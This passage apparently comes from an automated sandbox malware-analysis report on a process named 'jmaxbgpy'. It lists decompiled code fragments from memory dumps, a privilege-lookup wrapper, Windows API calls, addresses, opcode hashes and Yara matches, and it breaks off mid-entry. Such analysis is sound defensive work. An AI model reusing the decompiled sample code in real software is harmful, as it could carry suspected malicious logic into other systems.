                                                                    • Instruction Fuzzy Hash: AAE0C27368030426F72091A59C86FA6364E5B84B00F088475F90CD72C2D598E8C01024
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,07110A7A,00000000,?), ref: 0041E930
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                                    • Instruction ID: 7d567fb0b9b374d2fcadea76b5f186a9fefaaa7f04dd58c50085a667477643af
                                                                    • Opcode Fuzzy Hash: 7697639fdb2ed1d6984d37921a483162611dfaf69af01616cded54fe58bb6f02
                                                                    • Instruction Fuzzy Hash: E8E012B5600208ABCB14EF89DC49EA737ACAF88754F018059BA095B282C670E914CAB1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041EA63(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                    				int _t10;
                                                                    
                                                                    				E0041F243( *((intOrPtr*)(_a4 + 0x2f8)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x2f8)), 0, 0x46);
                                                                    				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                    				return _t10;
                                                                    			}




                                                                    0x0041ea7d
                                                                    0x0041ea93
                                                                    0x0041ea97

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEF5,0040FEF5,?,00000000,?,?), ref: 0041EA93
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_jmaxbgpy.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: b9bac6194bc143243254909c43a71d5c07130939405321bbf8bc0adf5f3a6230
                                                                    • Instruction ID: 441ee85fda3589afd26e41ae61f19a3667434cbc207aca3ddcc64c5dc7615bd2
                                                                    • Opcode Fuzzy Hash: b9bac6194bc143243254909c43a71d5c07130939405321bbf8bc0adf5f3a6230
                                                                    • Instruction Fuzzy Hash: 13E01AB56002046BC710DF89CC45EE777ADAF88654F014165BA0857242C675E9548AB5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                                                                    • Instruction ID: fd774d3b0bc61d3a7aa453021c1500bd91abd8bee620a0c201bc48005ce4c1ae
                                                                    • Opcode Fuzzy Hash: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                                                                    • Instruction Fuzzy Hash: 6DB09B729014C5C5E751D7E146087277E40BBD0741F16C065E2034645A4778C491F5B6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 66%
                                                                    			E00AE6A60(intOrPtr* _a4) {
                                                                    				signed int _v8;
                                                                    				char _v24;
                                                                    				signed char _v25;
                                                                    				intOrPtr* _v32;
                                                                    				signed char _v36;
                                                                    				signed int _v40;
                                                                    				intOrPtr* _v44;
                                                                    				char _v48;
                                                                    				intOrPtr _v52;
                                                                    				char _v56;
                                                                    				intOrPtr _v60;
                                                                    				intOrPtr _v64;
                                                                    				intOrPtr* _v68;
                                                                    				signed char _v72;
                                                                    				signed char _v76;
                                                                    				intOrPtr _v80;
                                                                    				intOrPtr _v84;
                                                                    				signed char _v88;
                                                                    				signed int _v92;
                                                                    				signed char _v96;
                                                                    				char _v100;
                                                                    				signed int _v104;
                                                                    				void* _v116;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr* _t101;
                                                                    				void* _t105;
                                                                    				signed int _t112;
                                                                    				signed int* _t113;
                                                                    				signed int* _t114;
                                                                    				intOrPtr _t117;
                                                                    				intOrPtr _t118;
                                                                    				void* _t122;
                                                                    				signed int _t127;
                                                                    				intOrPtr* _t128;
                                                                    				signed int _t131;
                                                                    				signed char _t134;
                                                                    				signed int _t136;
                                                                    				intOrPtr* _t138;
                                                                    				intOrPtr* _t139;
                                                                    				intOrPtr _t143;
                                                                    				signed char _t144;
                                                                    				signed short _t145;
                                                                    				signed char _t146;
                                                                    				intOrPtr* _t147;
                                                                    				intOrPtr _t148;
                                                                    				void* _t150;
                                                                    				char _t152;
                                                                    				signed int _t153;
                                                                    				signed char _t154;
                                                                    
                                                                    				_v8 =  *0xbad360 ^ _t153;
                                                                    				_t144 =  *0x7ffe03c6;
                                                                    				_v25 = _t144;
                                                                    				_t128 = _a4;
                                                                    				_v44 = _t128;
                                                                    				if((_t144 & 0x00000001) == 0) {
                                                                    					L54:
                                                                    					_push(0);
                                                                    					_push( &_v100);
                                                                    					E00AF9810();
                                                                    					 *_t128 = _v100;
                                                                    					 *(_t128 + 4) = _v96;
                                                                    					goto L20;
                                                                    				} else {
                                                                    					do {
                                                                    						_t148 =  *0x7ffe03b8;
                                                                    						_t134 =  *0x7FFE03BC;
                                                                    						_t146 =  *0x7FFE03BC;
                                                                    						_v60 = _t148;
                                                                    						_v76 = _t134;
                                                                    					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
                                                                    					_t128 = _v44;
                                                                    					if((_t144 & 0x00000002) != 0) {
                                                                    						_t147 =  *0xba6908; // 0x0
                                                                    						_v68 = _t147;
                                                                    						if(_t147 == 0) {
                                                                    							goto L54;
                                                                    						} else {
                                                                    							goto L22;
                                                                    						}
                                                                    						while(1) {
                                                                    							L22:
                                                                    							_t101 =  *_t147;
                                                                    							_v32 = _t101;
                                                                    							if(_t101 == 0) {
                                                                    								break;
                                                                    							}
                                                                    							if(_t144 >= 0) {
                                                                    								if((_t144 & 0x00000020) == 0) {
                                                                    									if((_t144 & 0x00000010) != 0) {
                                                                    										asm("mfence");
                                                                    									}
                                                                    								} else {
                                                                    									asm("lfence");
                                                                    								}
                                                                    								asm("rdtsc");
                                                                    							} else {
                                                                    								asm("rdtscp");
                                                                    								_v72 = _t134;
                                                                    							}
                                                                    							_v52 = _t101;
                                                                    							_v84 =  *((intOrPtr*)(_t147 + 8));
                                                                    							_v64 =  *((intOrPtr*)(_t147 + 0x10));
                                                                    							_v80 =  *((intOrPtr*)(_t147 + 0x14));
                                                                    							_t105 = E00AFCF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
                                                                    							_t146 = _t144;
                                                                    							E00AFCF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
                                                                    							_t150 = _t105 + _t144;
                                                                    							_t144 = _v25;
                                                                    							asm("adc edi, 0x0");
                                                                    							_v40 = _t150 + _v64;
                                                                    							_t147 = _v68;
                                                                    							asm("adc edi, [ebp-0x4c]");
                                                                    							_v36 = _t146;
                                                                    							if( *_t147 != _v32) {
                                                                    								continue;
                                                                    							} else {
                                                                    								_t128 = _v44;
                                                                    								_t147 = _v60;
                                                                    								L19:
                                                                    								_t144 = _v36;
                                                                    								asm("adc edx, [ebp-0x48]");
                                                                    								 *_t128 = E00AFD340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
                                                                    								 *(_t128 + 4) = _t144;
                                                                    								L20:
                                                                    								return E00AFB640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
                                                                    							}
                                                                    						}
                                                                    						_t128 = _v44;
                                                                    						goto L54;
                                                                    					}
                                                                    					_v56 = 0xffffffff;
                                                                    					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
                                                                    						_t136 = 0x14c;
                                                                    						L14:
                                                                    						_t112 = _t136 & 0x0000ffff;
                                                                    						L15:
                                                                    						if(_t112 == 0xaa64) {
                                                                    							_t113 =  &_v40;
                                                                    							_v32 = _t113;
                                                                    							_t138 = _v32;
                                                                    							asm("int 0x81");
                                                                    							 *_t138 = _t113;
                                                                    							 *(_t138 + 4) = _t144;
                                                                    							if((_t144 & 0x00000040) == 0) {
                                                                    								goto L19;
                                                                    							}
                                                                    							_t114 =  &_v92;
                                                                    							_v32 = _t114;
                                                                    							_t139 = _v32;
                                                                    							asm("int 0x81");
                                                                    							 *_t139 = _t114;
                                                                    							 *(_t139 + 4) = _t144;
                                                                    							_t144 = _v88;
                                                                    							if(((_t144 ^ _v36) & 0x00000001) != 0) {
                                                                    								goto L19;
                                                                    							}
                                                                    							_t112 = _v92;
                                                                    							L18:
                                                                    							_v40 = _t112;
                                                                    							_v36 = _t144;
                                                                    							goto L19;
                                                                    						}
                                                                    						if(_t144 >= 0) {
                                                                    							if((_t144 & 0x00000020) == 0) {
                                                                    								if((_t144 & 0x00000010) != 0) {
                                                                    									asm("mfence");
                                                                    								}
                                                                    							} else {
                                                                    								asm("lfence");
                                                                    							}
                                                                    							asm("rdtsc");
                                                                    						} else {
                                                                    							asm("rdtscp");
                                                                    						}
                                                                    						goto L18;
                                                                    					}
                                                                    					_t117 =  *[fs:0x18];
                                                                    					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
                                                                    					if(_t143 < 0) {
                                                                    						_t117 = _t117 + _t143;
                                                                    					}
                                                                    					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
                                                                    						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
                                                                    					} else {
                                                                    						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
                                                                    					}
                                                                    					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
                                                                    						L34:
                                                                    						_v48 = 0x10;
                                                                    						_push( &_v48);
                                                                    						_push(0x10);
                                                                    						_t146 =  &_v24;
                                                                    						_push(_t146);
                                                                    						_push(4);
                                                                    						_push( &_v56);
                                                                    						_push(0xb5);
                                                                    						_t122 = E00AFAA90();
                                                                    						if(_t122 == 0xc0000023) {
                                                                    							_t152 = _v48;
                                                                    							E00AFD000(_t152);
                                                                    							_t146 = _t154;
                                                                    							_push( &_v48);
                                                                    							_push(_t152);
                                                                    							_push(_t146);
                                                                    							_push(4);
                                                                    							_push( &_v56);
                                                                    							_push(0xb5);
                                                                    							_t122 = E00AFAA90();
                                                                    							_t147 = _v60;
                                                                    						}
                                                                    						if(_t122 < 0) {
                                                                    							_t112 = _v104;
                                                                    							_t144 = _v25;
                                                                    							goto L15;
                                                                    						} else {
                                                                    							_t145 =  *_t146;
                                                                    							_t136 = 0;
                                                                    							if(_t145 == 0) {
                                                                    								L43:
                                                                    								_t144 = _v25;
                                                                    								goto L14;
                                                                    							}
                                                                    							_t131 = 0;
                                                                    							do {
                                                                    								if((_t145 & 0x00040000) != 0) {
                                                                    									_t136 = _t145 & 0x0000ffff;
                                                                    								}
                                                                    								_t145 =  *(_t146 + 4 + _t131 * 4);
                                                                    								_t131 = _t131 + 1;
                                                                    							} while (_t145 != 0);
                                                                    							_t128 = _v44;
                                                                    							goto L43;
                                                                    						}
                                                                    					} else {
                                                                    						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
                                                                    						if(_t127 == 0) {
                                                                    							goto L34;
                                                                    						}
                                                                    						_t136 = _t127;
                                                                    						goto L14;
                                                                    					}
                                                                    				}
                                                                    			}






















































                                                                    0x00ae6a6f
                                                                    0x00ae6a72
                                                                    0x00ae6a78
                                                                    0x00ae6a7c
                                                                    0x00ae6a7f
                                                                    0x00ae6a87
                                                                    0x00b28049
                                                                    0x00b28049
                                                                    0x00b2804e
                                                                    0x00b2804f
                                                                    0x00b28057
                                                                    0x00b2805c
                                                                    0x00000000
                                                                    0x00ae6a8d
                                                                    0x00ae6a92
                                                                    0x00ae6a92
                                                                    0x00ae6a94
                                                                    0x00ae6a99
                                                                    0x00ae6a9c
                                                                    0x00ae6a9f
                                                                    0x00ae6aa2
                                                                    0x00ae6aaa
                                                                    0x00ae6ab0
                                                                    0x00b27eae
                                                                    0x00b27eb4
                                                                    0x00b27eb9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00b27ebf
                                                                    0x00b27ebf
                                                                    0x00b27ebf
                                                                    0x00b27ec1
                                                                    0x00b27ec6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00b27ece
                                                                    0x00b27edb
                                                                    0x00b27ee5
                                                                    0x00b27ee7
                                                                    0x00b27ee7
                                                                    0x00b27edd
                                                                    0x00b27edd
                                                                    0x00b27edd
                                                                    0x00b27eea
                                                                    0x00b27ed0
                                                                    0x00b27ed0
                                                                    0x00b27ed3
                                                                    0x00b27ed3
                                                                    0x00b27eec
                                                                    0x00b27ef8
                                                                    0x00b27f00
                                                                    0x00b27f07
                                                                    0x00b27f0a
                                                                    0x00b27f19
                                                                    0x00b27f1b
                                                                    0x00b27f23
                                                                    0x00b27f25
                                                                    0x00b27f28
                                                                    0x00b27f2e
                                                                    0x00b27f31
                                                                    0x00b27f34
                                                                    0x00b27f37
                                                                    0x00b27f3c
                                                                    0x00000000
                                                                    0x00b27f3e
                                                                    0x00b27f3e
                                                                    0x00b27f41
                                                                    0x00ae6b35
                                                                    0x00ae6b38
                                                                    0x00ae6b44
                                                                    0x00ae6b4c
                                                                    0x00ae6b4e
                                                                    0x00ae6b51
                                                                    0x00ae6b69
                                                                    0x00ae6b69
                                                                    0x00b27f3c
                                                                    0x00b28046
                                                                    0x00000000
                                                                    0x00b28046
                                                                    0x00ae6abc
                                                                    0x00ae6aca
                                                                    0x00b27f49
                                                                    0x00ae6b13
                                                                    0x00ae6b13
                                                                    0x00ae6b16
                                                                    0x00ae6b1e
                                                                    0x00b27fe7
                                                                    0x00b27fea
                                                                    0x00b27fed
                                                                    0x00b27ff0
                                                                    0x00b27ff2
                                                                    0x00b27ff4
                                                                    0x00b27ffa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00b28000
                                                                    0x00b28003
                                                                    0x00b28006
                                                                    0x00b28009
                                                                    0x00b2800b
                                                                    0x00b2800d
                                                                    0x00b28010
                                                                    0x00b2801f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00b28025
                                                                    0x00ae6b2f
                                                                    0x00ae6b2f
                                                                    0x00ae6b32
                                                                    0x00000000
                                                                    0x00ae6b32
                                                                    0x00ae6b26
                                                                    0x00b28030
                                                                    0x00b2803a
                                                                    0x00b2803c
                                                                    0x00b2803c
                                                                    0x00b28032
                                                                    0x00b28032
                                                                    0x00b28032
                                                                    0x00b2803f
                                                                    0x00ae6b2c
                                                                    0x00ae6b2c
                                                                    0x00ae6b2c
                                                                    0x00000000
                                                                    0x00ae6b26
                                                                    0x00ae6ad0
                                                                    0x00ae6ad6
                                                                    0x00ae6ade
                                                                    0x00ae6ae0
                                                                    0x00ae6ae0
                                                                    0x00ae6ae5
                                                                    0x00b27f53
                                                                    0x00ae6aeb
                                                                    0x00ae6aeb
                                                                    0x00ae6aeb
                                                                    0x00ae6af3
                                                                    0x00b27f5e
                                                                    0x00b27f61
                                                                    0x00b27f68
                                                                    0x00b27f69
                                                                    0x00b27f6b
                                                                    0x00b27f70
                                                                    0x00b27f71
                                                                    0x00b27f76
                                                                    0x00b27f77
                                                                    0x00b27f7c
                                                                    0x00b27f86
                                                                    0x00b27f88
                                                                    0x00b27f8d
                                                                    0x00b27f92
                                                                    0x00b27f97
                                                                    0x00b27f98
                                                                    0x00b27f99
                                                                    0x00b27f9a
                                                                    0x00b27f9f
                                                                    0x00b27fa0
                                                                    0x00b27fa5
                                                                    0x00b27faa
                                                                    0x00b27faa
                                                                    0x00b27faf
                                                                    0x00b27fdc
                                                                    0x00b27fdf
                                                                    0x00000000
                                                                    0x00b27fb1
                                                                    0x00b27fb1
                                                                    0x00b27fb3
                                                                    0x00b27fb8
                                                                    0x00b27fd4
                                                                    0x00b27fd4
                                                                    0x00000000
                                                                    0x00b27fd4
                                                                    0x00b27fba
                                                                    0x00b27fbc
                                                                    0x00b27fc2
                                                                    0x00b27fc4
                                                                    0x00b27fc4
                                                                    0x00b27fc7
                                                                    0x00b27fcb
                                                                    0x00b27fcc
                                                                    0x00b27fd1
                                                                    0x00000000
                                                                    0x00b27fd1
                                                                    0x00ae6b04
                                                                    0x00ae6b04
                                                                    0x00ae6b0b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00ae6b11
                                                                    0x00000000
                                                                    0x00ae6b11
                                                                    0x00ae6af3

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d4bf0e0b0c2cad305c4a911d5bdf81bbba6727cb70eea3b7a67e71bbcc94052
                                                                    • Instruction ID: 312871a65d2b78773a4b3c6c913d64b3d6df58c572204725ce4c2b92a75a6df6
                                                                    • Opcode Fuzzy Hash: 8d4bf0e0b0c2cad305c4a911d5bdf81bbba6727cb70eea3b7a67e71bbcc94052
                                                                    • Instruction Fuzzy Hash: 4C81AE71E442699FCB10CF99D981BEEBBF5EF18340F1480A9E948EB241D735AC05CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2bfb3a8bc5bc544f646085f5ce936838645f9ac4addc631e4942f5700ca285c0
                                                                    • Instruction ID: faece846fb01eb6975ba040edea2855791addd639896342270ecce2c82bcfbb4
                                                                    • Opcode Fuzzy Hash: 2bfb3a8bc5bc544f646085f5ce936838645f9ac4addc631e4942f5700ca285c0
                                                                    • Instruction Fuzzy Hash: 9D90026230100402E212619944146060449D7D1385F91C066E142455DD86A58963F172
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05628f6f88a0ad9cfbec20fcd8d854287109354aef3bb07ea65a995a2bbd8444
                                                                    • Instruction ID: 7d1b735a22a5b19649e6f154ef82d6e7de2103ddc7700c1ff13656aa99959475
                                                                    • Opcode Fuzzy Hash: 05628f6f88a0ad9cfbec20fcd8d854287109354aef3bb07ea65a995a2bbd8444
                                                                    • Instruction Fuzzy Hash: 3D90027224100402E251719944046060449E7D0381F91C066A042455CE86D58A66FAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d53a519ed181cab926f9a253407e43f4bc2a95bf5f0670db9a58b7b1a47f8df7
                                                                    • Instruction ID: f3c8290fe1112d82a342a523a8e0fc6da7db73fbf0a2c8117b1b59587387fdae
                                                                    • Opcode Fuzzy Hash: d53a519ed181cab926f9a253407e43f4bc2a95bf5f0670db9a58b7b1a47f8df7
                                                                    • Instruction Fuzzy Hash: B89002A2601140439650B19948044065455E7E1341391C175A0454568C86E88865E2A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                                                                    • Instruction ID: aec79115d10e9f29738519f80e8b9a6866d442d6f00b0e29aa5afbb39a493aa5
                                                                    • Opcode Fuzzy Hash: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                                                                    • Instruction Fuzzy Hash: E39002A221100042E214619944047060485D7E1341F51C066A215455CCC5A98C71A165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                                                                    • Instruction ID: 9f7130504737311f860d6fe042bcfaae4cab1c20afcb2dbc1997fe53db8d0800
                                                                    • Opcode Fuzzy Hash: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                                                                    • Instruction Fuzzy Hash: DF9002A220140403E250659948046070445D7D0342F51C065A206455DE8AA98C61B175
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                                                                    • Instruction ID: 40e25c194c463a6d34ac6240e12ccfff647f7827ab26df814024db3cc07110ab
                                                                    • Opcode Fuzzy Hash: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                                                                    • Instruction Fuzzy Hash: 9B90026220144442E25062994804B0F4545D7E1342F91C06DA415655CCC9958865A761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                                                                    • Instruction ID: cd24ce0a2d859d488f7286c22e6ed8d97b73ccb990e070c3ae511c639ad71a24
                                                                    • Opcode Fuzzy Hash: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                                                                    • Instruction Fuzzy Hash: 5590027220140402E210619948087470445D7D0342F51C065A516455DE86E5C8A1B571
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                                                                    • Instruction ID: 3cdc3c48c5b0749e7d2c3f303ad117662c45c56e1d3a974a83615c23a46df001
                                                                    • Opcode Fuzzy Hash: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                                                                    • Instruction Fuzzy Hash: 7990027220144002E2507199844460B5445E7E0341F51C465E042555CC86958866E261
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fb235cc81d1d297f08340f6198d408b720472cb025dcc21c65d616e335a7f04c
                                                                    • Instruction ID: b962c6b9c91677f59eabb441c46901add7741bb2ad88d548c5bcf5e74d541984
                                                                    • Opcode Fuzzy Hash: fb235cc81d1d297f08340f6198d408b720472cb025dcc21c65d616e335a7f04c
                                                                    • Instruction Fuzzy Hash: 3A90026224100802E250719984147070446D7D0741F51C065A002455CD86968975B6F1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c51ee4c99e8a14c8e8f452059d24e596f1cad2234df4a471970d7b31d795eea
                                                                    • Instruction ID: 04620aa6bb27d2803001550eeb25a7b6fbdadabc51dcd26a2ee6263f5864c7d4
                                                                    • Opcode Fuzzy Hash: 6c51ee4c99e8a14c8e8f452059d24e596f1cad2234df4a471970d7b31d795eea
                                                                    • Instruction Fuzzy Hash: 3990027220100802E214619948046860445D7D0341F51C065A602465DE96E588A1B171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 52be32c7dfa7951f1ea00aab82bd2d40db4785afb673e1f8e0cd7769511c122b
                                                                    • Instruction ID: b8ce471e7c7a138346ab2ae922cfa3cf3e060195f39402d61ad55433f7c77e70
                                                                    • Opcode Fuzzy Hash: 52be32c7dfa7951f1ea00aab82bd2d40db4785afb673e1f8e0cd7769511c122b
                                                                    • Instruction Fuzzy Hash: E69002E2201140929610A2998404B0A4945D7E0341B51C06AE1054568CC5A58861E175
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4431b7a0fee3c6e4234b446d916f211dfc089ebc4c8e3476879d7b817246d855
                                                                    • Instruction ID: 8e6825e6d6d7f7841f06e553eb539a3830a05f6e9ebce233d1af554e9509b2c3
                                                                    • Opcode Fuzzy Hash: 4431b7a0fee3c6e4234b446d916f211dfc089ebc4c8e3476879d7b817246d855
                                                                    • Instruction Fuzzy Hash: D2900272A0500012E250719948146464446E7E0781B55C065A051455CC89D48A65A3E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 99f7eb3025f0c89b7a8e7508f29e9fe1f57eeffef6c1518c9c71b137114873eb
                                                                    • Instruction ID: 646f29aa433657a7f6b878a5bb0b9a24a25762606e4e418690446bbce2054d3c
